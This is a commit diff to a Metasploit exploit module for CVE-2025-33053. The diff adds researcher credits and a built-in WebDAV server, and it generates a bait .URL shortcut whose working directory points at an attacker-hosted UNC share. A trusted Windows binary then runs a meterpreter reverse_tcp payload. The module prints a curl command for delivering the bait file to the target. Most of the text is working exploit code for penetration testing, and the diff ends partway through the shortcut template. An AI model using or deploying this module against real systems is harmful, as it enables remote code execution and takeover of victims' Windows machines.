Adds researchers in author section, base for WebDAV server

Author: msutovsky-r7

modules/exploits/windows/fileformat/cve_2025_33053.rb

@@ -1,9 +1,14 @@
-# frozen_string_literal: true
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
 
-# Metasploit module to exploit CVE-2025-33053 via malicious .URL and WebDAV payload hosting.
 class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::FILEFORMAT
+
   def initialize(info = {})
     super(
       update_info(
@@ -17,7 +22,11 @@ def initialize(info = {})
           potentially resulting in remote code execution via a trusted binary.
         },
 
-        'Author' => ['Dev Bui Hieu'],
+        'Author' => [
+          'Alexandra Gofman', # vuln research
+          'David Driker', # vuln research
+          'Dev Bui Hieu' # module dev
+        ],
         'License' => MSF_LICENSE,
         'DisclosureDate' => '2025-06-11',
         'References' => [
@@ -38,12 +47,13 @@ def initialize(info = {})
 
     register_options(
       [
+        OptString.new('URIPATH', [true, 'The URI to use (do not change)', '/']),
         OptString.new('OUTFILE', [true, 'Output URL file name', 'bait.url']),
         OptString.new('PAYLOAD_NAME', [true, 'Output payload file name', 'route.exe']),
         OptString.new('PAYLOAD', [true, 'Payload to generate', 'windows/x64/meterpreter/reverse_tcp']),
         OptBool.new('GEN_PAYLOAD', [true, 'Generate payload and move to WebDAV directory', true]),
         OptString.new('WEBDAV_DIR', [true, 'WebDAV directory path', '/var/www/webdav'])
-      ]
+      ], self.class
     )
     register_advanced_options(
       [
@@ -57,64 +67,51 @@ def initialize(info = {})
     )
   end
 
-  def exploit
-    prepare_webdav_dir
-    generate_payload_if_needed
-    write_url_file
-    print_status("Module complete. Deliver #{File.expand_path(datastore['OUTFILE'])} to victim.")
-  end
-
-  def prepare_webdav_dir
-    print_status('Creating WebDAV directory if not exists...')
-    FileUtils.mkdir_p(datastore['WEBDAV_DIR']) unless File.directory?(datastore['WEBDAV_DIR'])
-  rescue Errno::EACCES
-    fail_with(Failure::NoAccess,
-              "Cannot create WebDAV directory. Permission denied.\n" \
-              "Try restarting Metasploit with sudo or change ownership of #{datastore['WEBDAV_DIR']}.")
-  end
-
-  def generate_payload_if_needed
-    return unless datastore['GEN_PAYLOAD']
-
-    exe_path = File.join(datastore['WEBDAV_DIR'], datastore['PAYLOAD_NAME'])
-    print_status('Generating payload...')
-    generate_payload_exe(datastore['PAYLOAD'], datastore['LHOST'], datastore['LPORT'], exe_path)
-  end
-
-  def generate_payload_exe(payload_name, lhost, lport, output_path)
-    payload = framework.payloads.create(payload_name.to_s.strip)
-    payload.datastore['LHOST'] = lhost
-    payload.datastore['LPORT'] = lport
-    raw = payload.generate
-    exe = Msf::Util::EXE.to_win32pe(framework, raw)
-    write_exe_file(output_path, exe)
+  def on_request_uri(cli, request)
+    print_status('Got request')
+    case request.method
+    when 'OPTIONS'
+      print_status('[+] Got OPTIONS request')
+      process_options(cli, request)
+    when 'PROPFIND'
+      print_status('[+] Got PROPFIND request')
+      process_propfind(cli, request)
+    when 'GET'
+      print_status('[+] Got GET request')
+      process_get(cli, request)
+    else
+      process_ignore(cli, request)
+    end
   end
 
-  def write_exe_file(path, exe)
-    File.open(path, 'wb') { |f| f.write(exe) }
-    print_good("Payload successfully written to #{path}")
-  rescue Errno::EACCES
-    return_error(path)
+  def primer
+    webdav = '\\\\'
+    if datastore['SSL']
+      if datastore['SRVPORT'] != 443
+        fail_with(Failure::BadConfig, 'SRVPORT must be 443')
+      end
+      webdav = "#{datastore['SRVHOST']}@ssl"
+    else
+      webdav = "#{datastore['SRVHOST']}@#{datastore['SRVPORT']}"
+    end
+    webdav_unc = %(#{webdav}\\webdav\\)
+    print_status("[+] WebDAV running at #{webdav_unc}")
+    write_url_file(webdav_unc)
   end
 
-  def write_url_file
-    content = generate_url_content
-    outfile = datastore['OUTFILE']
-    begin
-      print_status('Generating .URL file...')
-      File.write(outfile, content)
-      print_good(".URL file written to: #{outfile}")
-    rescue Errno::EACCES
-      return_error(File.expand_path(outfile))
-    end
+  def write_url_file(webdav_unc)
+    content = generate_url_content(webdav_unc)
+    outfile = %(#{Rex::Text.rand_text_alphanumeric(8)}.url)
+    path = store_local('webdav.url', nil, content, outfile)
+    print_status("[+] URL file: #{path}, deliver to target's machine")
+    print_status("[+] Run following: curl http://#{datastore['SRVHOST']}:8080/#{outfile} -o #{outfile}")
   end
 
-  def generate_url_content
-    unc_path = "\\\\#{datastore['LHOST']}\\#{File.basename(datastore['WEBDAV_DIR'])}\\"
+  def generate_url_content(webdav_unc)
     <<~URLFILE
       [InternetShortcut]
       URL=#{datastore['LOLBAS_EXE']}
-      WorkingDirectory=#{unc_path}
+      WorkingDirectory=#{webdav_unc}
       ShowCommand=7
       IconIndex=#{datastore['ICON_INDEX']}
       IconFile=#{datastore['ICON_PATH']}